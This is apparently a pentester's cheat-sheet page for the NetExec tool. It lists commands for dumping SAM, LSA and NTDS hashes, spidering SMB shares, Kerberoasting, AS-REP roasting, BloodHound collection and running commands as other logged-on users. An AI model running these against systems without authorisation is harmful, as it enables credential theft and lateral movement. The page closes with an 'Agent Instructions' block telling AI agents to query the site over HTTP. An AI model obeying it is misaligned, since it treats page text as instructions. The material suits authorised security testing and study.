# NetExec

<figure><img src="/files/QCPuUwXCPbnMOAJd4tBj" alt=""><figcaption></figcaption></figure>

NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of *large* networks. It is based on CrackMapExec, which makes the tool familiar to use.

Personally, I think the modules from NetExec make it worth to use the tool.

{% embed url="<https://www.netexec.wiki/>" %}

***

## SMB spidering shares

Spider and export all files from shares:

```
nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
```

List all readable files:

```
nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus
```

## Dumping hashes

Dumping SAM

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
```

Dumping LSA

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
```

Dumping from NTDS.dit

```
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
```

## Bloodhound

If you have creds, you can use nxc to get a zip or .json files for bloodhound

```
nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All
```

## AS-REP Roasting

Only one user

```
nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
```

List including usernames

```
nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
```

## Kerberoasting

```
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
```

## SMB logged on users

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
```

## SMB active sessions

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
```

## SMB Execute commands on behalf of other users

```
nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
```

<figure><img src="/files/reP8Q4pJXnPJ4CYRouoJ" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/windows-pentesting/tools/netexec.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.